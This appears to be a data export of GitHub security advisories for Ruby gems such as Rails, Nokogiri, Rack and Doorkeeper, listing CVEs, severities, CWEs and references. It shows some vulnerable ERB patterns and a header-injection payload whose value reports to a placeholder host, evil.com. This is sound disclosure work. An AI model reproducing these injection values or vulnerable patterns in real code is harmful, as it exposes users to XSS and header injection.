There is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. ### Impact When an HTML-unsafe string is passed as the default for a missing translation key [named `html` or ending in `_html`](https://guides.rubyonrails.org/i18n.html#using-safe-html-translations), the default string is incorrectly marked as HTML-safe and not escaped. Vulnerable code may look like the following examples: ```erb <%# The welcome_html translation is not defined for the current locale: %> <%= t("welcome_html", default: untrusted_user_controlled_string) %> <%# Neither the title.html translation nor the missing.html translation is defined for the current locale: %> <%= t("title.html", default: [:"missing.html", untrusted_user_controlled_string]) %> ``` ### Patches Patched Rails versions, 6.0.3.3 and 5.2.4.4, are available from the normal locations. The patches have also been applied to the `master`, `6-0-stable`, and `5-2-stable` branches on GitHub. If you track any of these branches, you should update to the latest. To aid users who aren’t able to upgrade immediately, we’ve provided patches for the two supported release series. They are in git-am format and consist of a single changeset. * [5-2-translate-helper-xss.patch](https://gist.github.com/georgeclaghorn/a466e103922ee81f24c32c9034089442#file-5-2-translate-helper-xss-patch) — patch for the 5.2 release series * [6-0-translate-helper-xss.patch](https://gist.github.com/georgeclaghorn/a466e103922ee81f24c32c9034089442#file-6-0-translate-helper-xss-patch) — patch for the 6.0 release series Please note that only the 5.2 and 6.0 release series are currently supported. Users of earlier, unsupported releases are advised to update as soon as possible, as we cannot provide security fixes for unsupported releases. ### Workarounds Impacted users who can’t upgrade to a patched Rails version can avoid this issue by manually escaping default translations with the `html_escape` helper (aliased as `h`): ```erb <%= t("welcome_html", default: h(untrusted_user_controlled_string)) %> ```
{'CVE-2020-15169'}
2022-03-03T05:13:09.709282Z
2020-09-11T15:19:57Z
MODERATE
null
{'CWE-79'}
{'https://github.com/rails/rails/commit/e663f084460ea56c55c3dc76f78c7caeddeeb02e', 'https://lists.debian.org/debian-lts-announce/2020/10/msg00015.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15169', 'https://www.debian.org/security/2020/dsa-4766', 'https://github.com/rails/rails', 'https://github.com/rails/rails/security/advisories/GHSA-cfjv-5498-mph5'}
null
RubyGems
GHSA-94cq-7ccq-cmcm
lynx doesn't properly sanitize user input and exposes database password to unauthorized users
The lynx gem 0.2.0 for Ruby places the configured password on command lines, which allows local users to obtain sensitive information by listing processes.
{'CVE-2014-5002'}
2022-04-25T22:31:54.267751Z
2018-01-24T17:10:45Z
HIGH
null
null
{'https://github.com/advisories/GHSA-94cq-7ccq-cmcm', 'http://www.vapid.dhs.org/advisories/lynx-0.2.0.html', 'http://www.openwall.com/lists/oss-security/2014/07/07/23', 'https://nvd.nist.gov/vuln/detail/CVE-2014-5002', 'https://github.com/panthomakos/lynx', 'https://github.com/panthomakos/lynx/issues/3', 'http://www.openwall.com/lists/oss-security/2014/07/17/5'}
null
RubyGems
GHSA-rg5m-3fqp-6px8
Moderate severity vulnerability that affects actionmailer
Multiple format string vulnerabilities in log_subscriber.rb files in the log subscriber component in Action Mailer in Ruby on Rails 3.x before 3.2.15 allow remote attackers to cause a denial of service via a crafted e-mail address that is improperly handled during construction of a log message.
{'CVE-2013-4389'}
2022-03-03T05:13:29.155044Z
2017-10-24T18:33:37Z
MODERATE
null
{'CWE-134'}
{'https://nvd.nist.gov/vuln/detail/CVE-2013-4389', 'http://lists.opensuse.org/opensuse-updates/2013-12/msg00091.html', 'https://github.com/advisories/GHSA-rg5m-3fqp-6px8', 'http://lists.opensuse.org/opensuse-updates/2013-12/msg00094.html', 'https://groups.google.com/forum/message/raw?msg=ruby-security-ann/yvlR1Vx44c8/elKJkpO2KVgJ', 'http://www.debian.org/security/2014/dsa-2888', 'http://lists.opensuse.org/opensuse-updates/2014-01/msg00003.html', 'http://www.debian.org/security/2014/dsa-2887'}
null
RubyGems
GHSA-cpjc-p7fc-j9xh
Moderate severity vulnerability that affects mail
The deliver function in the sendmail delivery agent (lib/mail/network/delivery_methods/sendmail.rb) in Ruby Mail gem 2.2.14 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in an e-mail address.
{'CVE-2011-0739'}
2022-03-03T05:13:55.063743Z
2017-10-24T18:33:38Z
MODERATE
null
{'CWE-20'}
{'https://github.com/mikel/mail', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/65010', 'http://www.securityfocus.com/bid/46021', 'http://osvdb.org/70667', 'https://nvd.nist.gov/vuln/detail/CVE-2011-0739', 'http://groups.google.com/group/mail-ruby/browse_thread/thread/e93bbd05706478dd?pli=1', 'http://secunia.com/advisories/43077', 'http://www.vupen.com/english/advisories/2011/0233', 'https://github.com/advisories/GHSA-cpjc-p7fc-j9xh', 'https://github.com/mikel/mail/raw/master/patches/20110126_sendmail.patch'}
null
RubyGems
GHSA-3jqw-vv45-mjhh
XSS/Script injection vulnerability in matestack
matestack-ui-core (RubyGem) before 0.7.4 is vulnerable to XSS/Script injection. This vulnerability is patched in version 0.7.4.
{'CVE-2020-5241'}
2022-03-03T05:12:47.466249Z
2020-02-12T23:37:46Z
HIGH
null
{'CWE-80'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-5241', 'https://github.com/matestack/matestack-ui-core/security/advisories/GHSA-3jqw-vv45-mjhh'}
null
RubyGems
GHSA-v6gp-9mmm-c6p5
Out-of-bounds Write in zlib affects Nokogiri
## Summary Nokogiri v1.13.4 updates the vendored zlib from 1.2.11 to 1.2.12, which addresses [CVE-2018-25032](https://nvd.nist.gov/vuln/detail/CVE-2018-25032). That CVE is scored as CVSS 7.4 "High" on the NVD record as of 2022-04-05. Please note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.13.4`, and only if the packaged version of `zlib` is being used. Please see [this document](https://nokogiri.org/LICENSE-DEPENDENCIES.html#default-platform-release-ruby) for a complete description of which platform gems vendor `zlib`. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's `zlib` release announcements. ## Mitigation Upgrade to Nokogiri `>= v1.13.4`. ## Impact ### [CVE-2018-25032](https://nvd.nist.gov/vuln/detail/CVE-2018-25032) in zlib - **Severity**: High - **Type**: [CWE-787](https://cwe.mitre.org/data/definitions/787.html) Out of bounds write - **Description**: zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.
null
2022-04-11T21:46:08.649415Z
2022-04-11T21:21:28Z
HIGH
null
{'CWE-787'}
{'https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4', 'https://github.com/advisories/GHSA-jc36-42cf-vqwj', 'https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5', 'https://github.com/sparklemotion/nokogiri', 'https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ?utm_medium=email&utm_source=footer', 'https://nvd.nist.gov/vuln/detail/CVE-2018-25032'}
null
RubyGems
GHSA-vv4c-g6q7-p3q7
Moderate severity vulnerability that affects doorkeeper-openid_connect
Doorkeeper::OpenidConnect (aka the OpenID Connect extension for Doorkeeper) 1.4.x and 1.5.x before 1.5.4 has an open redirect via the redirect_uri field in an OAuth authorization request (that results in an error response) with the 'openid' scope and a prompt=none value. This allows phishing attacks against the authorization flow.
{'CVE-2019-9837'}
2022-03-03T05:13:38.901651Z
2019-03-25T16:15:54Z
MODERATE
null
{'CWE-601'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-9837', 'https://github.com/doorkeeper-gem/doorkeeper-openid_connect/pull/66', 'https://github.com/doorkeeper-gem/doorkeeper-openid_connect', 'https://github.com/advisories/GHSA-vv4c-g6q7-p3q7', 'https://github.com/doorkeeper-gem/doorkeeper-openid_connect/blob/master/CHANGELOG.md', 'https://github.com/doorkeeper-gem/doorkeeper-openid_connect/issues/61'}
null
RubyGems
GHSA-573x-jhqh-jg36
Moderate severity vulnerability that affects chloride
Prior to version 0.3.0, chloride's use of net-ssh resulted in host fingerprints for previously unknown hosts getting added to the user's known_hosts file without confirmation. In version 0.3.0 this is updated so that the user's known_hosts file is not updated by chloride.
{'CVE-2018-6517'}
2022-03-03T05:14:21.716074Z
2019-03-25T16:16:27Z
HIGH
null
{'CWE-295'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-6517', 'https://puppet.com/security/cve/CVE-2018-6517', 'https://github.com/advisories/GHSA-573x-jhqh-jg36'}
null
RubyGems
GHSA-229r-pqp6-8w6g
High severity vulnerability that affects sprout
The unpack_zip function in archive_unpacker.rb in the sprout gem 0.7.246 for Ruby allows context-dependent attackers to execute arbitrary commands via shell metacharacters in a (1) filename or (2) path.
{'CVE-2013-6421'}
2022-03-03T05:14:20.863615Z
2017-10-24T18:33:36Z
HIGH
null
{'CWE-94'}
{'https://github.com/advisories/GHSA-229r-pqp6-8w6g', 'http://archives.neohapsis.com/archives/bugtraq/2013-12/0077.html', 'https://nvd.nist.gov/vuln/detail/CVE-2013-6421', 'http://vapid.dhs.org/advisories/sprout-0.7.246-command-inj.html', 'http://www.openwall.com/lists/oss-security/2013/12/03/6', 'http://www.openwall.com/lists/oss-security/2013/12/03/1'}
null
RubyGems
GHSA-hrqr-hxpp-chr3
Possible Information Leak / Session Hijack Vulnerability in Rack
There's a possible information leak / session hijack vulnerability in Rack. Attackers may be able to find and hijack sessions by using timing attacks targeting the session id. Session ids are usually stored and indexed in a database that uses some kind of scheme for speeding up lookups of that session id. By carefully measuring the amount of time it takes to look up a session, an attacker may be able to find a valid session id and hijack the session. The session id itself may be generated randomly, but the way the session is indexed by the backing store does not use a secure comparison. ### Impact The session id stored in a cookie is the same id that is used when querying the backing session storage engine. Most storage mechanisms (for example a database) use some sort of indexing in order to speed up the lookup of that id. By carefully timing requests and session lookup failures, an attacker may be able to perform a timing attack to determine an existing session id and hijack that session. ## Releases The 1.6.12 and 2.0.8 releases are available at the normal locations. ### Workarounds There are no known workarounds. ### Patches To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. * 1-6-session-timing-attack.patch - Patch for 1.6 series * 2-0-session-timing-attack.patch - Patch for 2.6 series ### Credits Thanks Will Leinweber for reporting this!
{'CVE-2019-16782'}
2022-03-03T05:13:31.216463Z
2019-12-18T19:01:31Z
MODERATE
null
{'CWE-208', 'CWE-203'}
{'http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00016.html', 'https://github.com/rack/rack/security/advisories/GHSA-hrqr-hxpp-chr3', 'http://www.openwall.com/lists/oss-security/2019/12/19/3', 'http://www.openwall.com/lists/oss-security/2020/04/09/2', 'https://github.com/rack/rack', 'http://www.openwall.com/lists/oss-security/2019/12/18/2', 'http://www.openwall.com/lists/oss-security/2019/12/18/3', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16782', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZXMWILCICQLA2BYSP6I2CRMUG53YBLX/', 'http://www.openwall.com/lists/oss-security/2020/04/08/1', 'https://github.com/rack/rack/commit/7fecaee81f59926b6e1913511c90650e76673b38'}
null
RubyGems
GHSA-m46p-ggm5-5j83
Moderate severity vulnerability that affects rails
Multiple cross-site scripting (XSS) vulnerabilities in actionview/lib/action_view/helpers/number_helper.rb in Ruby on Rails before 3.2.17, 4.0.x before 4.0.3, and 4.1.x before 4.1.0.beta2 allow remote attackers to inject arbitrary web script or HTML via the (1) format, (2) negative_format, or (3) units parameter to the (a) number_to_currency, (b) number_to_percentage, or (c) number_to_human helper.
{'CVE-2014-0081'}
2022-03-03T05:13:51.781821Z
2017-10-24T18:33:36Z
MODERATE
null
{'CWE-79'}
{'http://openwall.com/lists/oss-security/2014/02/18/8', 'http://lists.opensuse.org/opensuse-updates/2014-02/msg00081.html', 'https://nvd.nist.gov/vuln/detail/CVE-2014-0081', 'https://groups.google.com/forum/message/raw?msg=rubyonrails-security/tfp6gZCtzr4/j8LUHmu7fIEJ', 'http://rhn.redhat.com/errata/RHSA-2014-0215.html', 'http://secunia.com/advisories/57376', 'http://www.securitytracker.com/id/1029782', 'http://www.securityfocus.com/bid/65647', 'https://github.com/rails/rails', 'http://rhn.redhat.com/errata/RHSA-2014-0306.html', 'https://github.com/advisories/GHSA-m46p-ggm5-5j83'}
null
RubyGems
GHSA-2rr5-8q37-2w7h
Improper Restriction of XML External Entity Reference (XXE) in Nokogiri on JRuby
### Severity The Nokogiri maintainers have evaluated this as [**High Severity** 7.5 (CVSS3.0)](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C/MAV:N/MAC:L) for JRuby users. (This security advisory does not apply to CRuby users.) ### Impact In Nokogiri v1.12.4 and earlier, **on JRuby only**, the SAX parser resolves external entities by default. Users of Nokogiri on JRuby who parse untrusted documents using any of these classes are affected: - Nokogiri::XML::SAX::Parser - Nokogiri::HTML4::SAX::Parser or its alias Nokogiri::HTML::SAX::Parser - Nokogiri::XML::SAX::PushParser - Nokogiri::HTML4::SAX::PushParser or its alias Nokogiri::HTML::SAX::PushParser ### Mitigation JRuby users should upgrade to Nokogiri v1.12.5 or later. There are no workarounds available for v1.12.4 or earlier. CRuby users are not affected.
{'CVE-2021-41098'}
2022-03-03T05:13:14.323333Z
2021-09-27T20:12:47Z
HIGH
null
{'CWE-611'}
{'https://github.com/sparklemotion/nokogiri/commit/5bf729ff3cc84709ee3c3248c981584088bf9f6d', 'https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-2rr5-8q37-2w7h', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41098', 'https://github.com/sparklemotion/nokogiri'}
null
RubyGems
GHSA-qrgf-jqqm-x7xv
High severity vulnerability that affects dragonfly
lib/dragonfly/imagemagickutils.rb in the fog-dragonfly gem 0.8.2 for Ruby allows remote attackers to execute arbitrary commands via unspecified vectors.
{'CVE-2013-5671'}
2022-03-03T05:14:07.625421Z
2017-10-24T18:33:37Z
HIGH
null
null
{'https://github.com/advisories/GHSA-qrgf-jqqm-x7xv', 'http://seclists.org/oss-sec/2013/q3/526', 'https://nvd.nist.gov/vuln/detail/CVE-2013-5671', 'http://www.osvdb.org/96798', 'http://seclists.org/fulldisclosure/2013/Sep/18', 'http://www.vapid.dhs.org/advisories/fog-dragonfly-0.8.2-cmd-inj.html', 'http://seclists.org/oss-sec/2013/q3/528'}
null
RubyGems
GHSA-882p-jqgm-f45g
Moderate severity vulnerability that affects nokogiri
The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file.
{'CVE-2017-18258'}
2022-03-03T05:13:37.001005Z
2018-04-13T16:17:46Z
MODERATE
null
{'CWE-770'}
{'https://github.com/advisories/GHSA-882p-jqgm-f45g', 'https://nvd.nist.gov/vuln/detail/CVE-2017-18258', 'https://kc.mcafee.com/corporate/index?page=content&id=SB10284', 'https://lists.debian.org/debian-lts-announce/2018/09/msg00035.html', 'https://security.netapp.com/advisory/ntap-20190719-0001/', 'https://usn.ubuntu.com/3739-1/', 'https://lists.debian.org/debian-lts-announce/2020/09/msg00009.html', 'https://git.gnome.org/browse/libxml2/commit/?id=e2a9122b8dde53d320750451e9907a7dcb2ca8bb'}
null
RubyGems
GHSA-qw8w-2xcp-xg59
Low severity vulnerability that affects passenger
Phusion Passenger 4.0.37 allows local users to write to certain files and directories via a symlink attack on (1) control_process.pid or a (2) generation-* file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-1831.
{'CVE-2014-1832'}
2021-09-16T21:10:02Z
2018-10-10T17:29:27Z
LOW
null
null
{'https://nvd.nist.gov/vuln/detail/CVE-2014-1832', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=736958', 'https://bugzilla.redhat.com/show_bug.cgi?id=1058992', 'https://github.com/phusion/passenger', 'https://github.com/advisories/GHSA-qw8w-2xcp-xg59', 'http://openwall.com/lists/oss-security/2014/01/30/3', 'http://lists.fedoraproject.org/pipermail/package-announce/2015-February/149032.html', 'http://openwall.com/lists/oss-security/2014/01/29/6', 'https://github.com/phusion/passenger/commit/94428057c602da3d6d34ef75c78091066ecac5c0'}
null
RubyGems
GHSA-36p7-xjw8-h6f2
Ruby-saml allows attackers to perform XML signature wrapping attacks via unspecified vectors
Ruby-saml before 1.3.0 allows attackers to perform XML signature wrapping attacks via unspecified vectors.
{'CVE-2016-5697'}
2022-04-26T18:33:06.866072Z
2018-08-21T17:08:30Z
HIGH
null
{'CWE-91'}
{'http://www.openwall.com/lists/oss-security/2016/06/24/3', 'https://github.com/advisories/GHSA-36p7-xjw8-h6f2', 'https://nvd.nist.gov/vuln/detail/CVE-2016-5697'}
null
RubyGems
GHSA-vx9g-377x-xwxq
Server side request forgery in gibbon
Gibbon v3.4.3 and below allows attackers to execute a Server-Side Request Forgery (SSRF) via a crafted URL. This issue has been resolved in version 3.4.4
{'CVE-2022-27311'}
2022-05-02T22:49:46.137527Z
2022-04-26T00:00:41Z
HIGH
null
{'CWE-918'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-27311', 'https://github.com/amro/gibbon/pull/321#issuecomment-1113147155', 'https://github.com/amro/gibbon', 'https://github.com/amro/gibbon/pull/321'}
null
RubyGems
GHSA-xgr2-v94m-rc9g
High severity vulnerability that affects activesupport
lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before 2.3.16 and 3.0.x before 3.0.20 does not properly convert JSON data to YAML data for processing by a YAML parser, which allows remote attackers to execute arbitrary code, conduct SQL injection attacks, or bypass authentication via crafted data that triggers unsafe decoding, a different vulnerability than CVE-2013-0156.
{'CVE-2013-0333'}
2022-03-03T05:14:21.623491Z
2017-10-24T18:33:37Z
HIGH
null
null
{'https://nvd.nist.gov/vuln/detail/CVE-2013-0333', 'http://www.debian.org/security/2013/dsa-2613', 'http://support.apple.com/kb/HT5784', 'http://lists.apple.com/archives/security-announce/2013/Mar/msg00002.html', 'http://rhn.redhat.com/errata/RHSA-2013-0201.html', 'https://github.com/advisories/GHSA-xgr2-v94m-rc9g', 'http://rhn.redhat.com/errata/RHSA-2013-0203.html', 'http://rhn.redhat.com/errata/RHSA-2013-0202.html', 'http://www.kb.cert.org/vuls/id/628463', 'http://lists.apple.com/archives/security-announce/2013/Jun/msg00000.html', 'https://groups.google.com/group/rubyonrails-security/msg/52179af76915e518?dmode=source&output=gplain', 'https://puppet.com/security/cve/cve-2013-0333', 'http://weblog.rubyonrails.org/2013/1/28/Rails-3-0-20-and-2-3-16-have-been-released/'}
null
RubyGems
GHSA-xfhh-rx56-rxcr
Path Traversal vulnerability that affects yard
## Possible arbitrary path traversal and file access via `yard server` ### Impact A path traversal vulnerability was discovered in YARD <= 0.9.19 when using `yard server` to serve documentation. This bug would allow unsanitized HTTP requests to access arbitrary files on the machine of a yard server host under certain conditions. Thanks to CuongMX from Viettel Cyber Security for discovering this vulnerability. ### Patches Please upgrade to YARD v0.9.20 immediately if you are relying on yard server to host documentation in any untrusted environments. ### Workarounds For users who cannot upgrade, it is possible to perform path sanitization of HTTP requests at your webserver level. WEBrick, for example, can perform such sanitization by default (which you can use via `yard server -s webrick`), as can certain rules in your webserver configuration.
{'CVE-2019-1020001'}
2022-03-03T05:13:51.009273Z
2019-07-02T15:28:38Z
HIGH
null
{'CWE-22'}
{'https://github.com/lsegal/yard/security/advisories/GHSA-xfhh-rx56-rxcr', 'https://github.com/advisories/GHSA-xfhh-rx56-rxcr', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1020001'}
null
RubyGems
GHSA-w978-rmpf-qmwg
Limited header injection when using dynamic overrides with user input in RubyGems secure_headers
### Impact If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline. e.g. ```ruby override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])` ``` would result in ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: injected Content-Security-Policy: rest-of-the-header ``` CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial: ```ruby override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) ``` ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: default-src 'none'; report-uri evil.com Content-Security-Policy: rest-of-the-header ``` ### Patches This has been fixed in 6.3.0, 5.2.0, and 3.9.0 ### Workarounds ```ruby override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")]) ``` ### References https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c [The effect of multiple policies](https://www.w3.org/TR/CSP3/#multiple-policies) ### For more information If you have any questions or comments about this advisory: * Open an issue in [this repo](https://github.com/twitter/secure_headers/security/advisories/new) * DM us at @ndm on twitter
{'CVE-2020-5216'}
2022-03-03T05:13:23.477762Z
2020-01-23T02:27:53Z
MODERATE
null
{'CWE-113'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-5216', 'https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg', 'https://github.com/twitter/secure_headers/commit/301695706f6a70517c2a90c6ef9b32178440a2d0'}
null
RubyGems
GHSA-j7vx-8mqj-cqp9
Exposure of Sensitive Information to an Unauthorized Actor in Doorkeeper
### Impact Information disclosure vulnerability. Allows an attacker to see all `Doorkeeper::Application` model attribute values (including secrets) using authorized applications controller if it's enabled (GET /oauth/authorized_applications.json). ### Patches These versions have the fix: * 5.0.3 * 5.1.1 * 5.2.5 * 5.3.2 ### Workarounds Patch `Doorkeeper::Application` model `#as_json(options = {})` method and define only those attributes you want to expose. Additional recommended hardening is to enable application secrets hashing ([guide](https://doorkeeper.gitbook.io/guides/security/token-and-application-secrets)), available since Doorkeeper 5.1. This would render the exposed secret useless. ### References - Commit with fix: https://github.com/doorkeeper-gem/doorkeeper/commit/25d038022c2fcad45af5b73f9d003cf38ff491f6 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10187
{'CVE-2020-10187'}
2022-03-03T05:13:28.486543Z
2020-05-07T21:11:07Z
HIGH
null
{'CWE-862'}
{'https://github.com/rubysec/ruby-advisory-db/pull/446', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10187', 'https://github.com/doorkeeper-gem/doorkeeper/commit/25d038022c2fcad45af5b73f9d003cf38ff491f6', 'https://github.com/doorkeeper-gem/doorkeeper/releases', 'https://github.com/doorkeeper-gem/doorkeeper/security/advisories/GHSA-j7vx-8mqj-cqp9'}
null
RubyGems
GHSA-8877-prq4-9xfw
Open Redirect in actionpack
The Host Authorization middleware in Action Pack before 6.1.2.1, 6.0.3.5 suffers from an open redirect vulnerability. Specially crafted `Host` headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. Impacted applications will have allowed hosts with a leading dot. When an allowed host contains a leading dot, a specially crafted `Host` header can be used to redirect to a malicious website.
{'CVE-2021-22881'}
2022-03-03T05:12:02.599151Z
2021-03-02T03:44:17Z
MODERATE
null
{'CWE-601'}
{'http://www.openwall.com/lists/oss-security/2021/12/14/5', 'http://www.openwall.com/lists/oss-security/2021/05/05/2', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XQ3NS4IBYE2I3MVMGAHFZBZBIZGHXHT3/', 'https://discuss.rubyonrails.org/t/cve-2021-22881-possible-open-redirect-in-host-authorization-middleware/77130', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22881', 'https://hackerone.com/reports/1047447', 'https://rubygems.org/gems/actionpack', 'http://www.openwall.com/lists/oss-security/2021/08/20/1', 'https://benjamin-bouchet.com/cve-2021-22881-faille-de-securite-dans-le-middleware-hostauthorization/'}
null
RubyGems
GHSA-ch3h-j2vf-95pv
XSS Vulnerability in Action View tag helpers
There is a possible XSS vulnerability in Action View tag helpers. Passing untrusted input as hash keys can lead to a possible XSS vulnerability. This vulnerability has been assigned the CVE identifier CVE-2022-27777. Versions Affected: ALL Not affected: NONE Fixed Versions: 7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1 ## Impact If untrusted data is passed as the hash key for tag attributes, there is a possibility that the untrusted data may not be properly escaped which can lead to an XSS vulnerability. Impacted code will look something like this: ``` check_box_tag('thename', 'thevalue', false, aria: { malicious_input => 'thevalueofaria' }) ``` Where the "malicious_input" variable contains untrusted data. All users running an affected release should either upgrade or use one of the workarounds immediately. ## Releases The FIXED releases are available at the normal locations. ## Workarounds Escape the untrusted data before using it as a key for tag helper methods.
{'CVE-2022-27777'}
2022-04-27T23:16:59.052518Z
2022-04-27T22:32:49Z
HIGH
null
{'CWE-79'}
{'https://rubyonrails.org/2022/4/26/Rails-7-0-2-4-6-1-5-1-6-0-4-8-and-5-2-7-1-have-been-released', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2022-27777.yml', 'https://groups.google.com/g/ruby-security-ann/c/9wJPEDv-iRw', 'https://github.com/rails/rails', 'https://nvd.nist.gov/vuln/detail/CVE-2022-27777', 'https://github.com/rails/rails/commit/649516ce0feb699ae06a8c5e81df75d460cc9a85'}
null
RubyGems
GHSA-q34c-48gc-m9g8
Moderate severity vulnerability that affects actionpack
actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not properly consider differences in parameter handling between the Active Record component and the Rack interface, which allows remote attackers to bypass intended database-query restrictions and perform NULL checks via a crafted request, as demonstrated by certain "['xyz', nil]" values, a related issue to CVE-2012-2660.
{'CVE-2012-2694'}
2022-03-03T05:13:53.944395Z
2017-10-24T18:33:38Z
MODERATE
null
null
{'http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00017.html', 'http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00002.html', 'https://nvd.nist.gov/vuln/detail/CVE-2012-2694', 'http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00016.html', 'http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00014.html', 'https://groups.google.com/group/rubyonrails-security/msg/e2d3a87f2c211def?dmode=source&output=gplain', 'https://github.com/advisories/GHSA-q34c-48gc-m9g8', 'http://lists.opensuse.org/opensuse-updates/2012-08/msg00046.html', 'http://rhn.redhat.com/errata/RHSA-2013-0154.html'}
null
RubyGems
GHSA-jmgw-6vjg-jjwg
High severity vulnerability that affects actionpack
active_support/core_ext/hash/conversions.rb in Ruby on Rails before 2.3.15, 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly restrict casts of string values, which allows remote attackers to conduct object-injection attacks and execute arbitrary code, or cause a denial of service (memory and CPU consumption) involving nested XML entity references, by leveraging Action Pack support for (1) YAML type conversion or (2) Symbol type conversion.
{'CVE-2013-0156'}
2022-03-03T05:13:57.731325Z
2017-10-24T18:33:37Z
HIGH
null
{'CWE-20'}
{'https://github.com/advisories/GHSA-jmgw-6vjg-jjwg', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156', 'https://puppet.com/security/cve/cve-2013-0156', 'https://groups.google.com/group/rubyonrails-security/msg/c1432d0f8c70e89d?dmode=source&output=gplain', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-036-01A', 'http://lists.apple.com/archives/security-announce/2013/Mar/msg00002.html', 'http://www.debian.org/security/2013/dsa-2604', 'http://www.kb.cert.org/vuls/id/380039', 'http://rhn.redhat.com/errata/RHSA-2013-0153.html', 'http://rhn.redhat.com/errata/RHSA-2013-0155.html', 'http://www.fujitsu.com/global/support/software/security/products-f/sw-sv-rcve-ror201301e.html', 'http://rhn.redhat.com/errata/RHSA-2013-0154.html', 'https://nvd.nist.gov/vuln/detail/CVE-2013-0156', 'https://github.com/rails/rails', 'http://www.kb.cert.org/vuls/id/628463', 'http://www.insinuator.net/2013/01/rails-yaml/', 'http://weblog.rubyonrails.org/2013/1/28/Rails-3-0-20-and-2-3-16-have-been-released/'}
null
RubyGems
GHSA-j96r-xvjq-r9pg
Moderate severity vulnerability that affects activesupport
The (1) jdom.rb and (2) rexml.rb components in Active Support in Ruby on Rails before 4.1.11 and 4.2.x before 4.2.2, when JDOM or REXML is enabled, allow remote attackers to cause a denial of service (SystemStackError) via a large XML document depth.
{'CVE-2015-3227'}
2022-03-03T05:13:07.896810Z
2017-10-24T18:33:36Z
MODERATE
null
null
{'http://www.securityfocus.com/bid/75234', 'https://groups.google.com/forum/message/raw?msg=rubyonrails-security/bahr2JLnxvk/x4EocXnHPp8J', 'http://lists.opensuse.org/opensuse-updates/2015-07/msg00050.html', 'http://www.securitytracker.com/id/1033755', 'https://github.com/advisories/GHSA-j96r-xvjq-r9pg', 'http://www.debian.org/security/2016/dsa-3464', 'https://nvd.nist.gov/vuln/detail/CVE-2015-3227', 'http://openwall.com/lists/oss-security/2015/06/16/16'}
null
RubyGems
GHSA-xxx9-3xcr-gjj3
XML Injection in Xerces Java affects Nokogiri
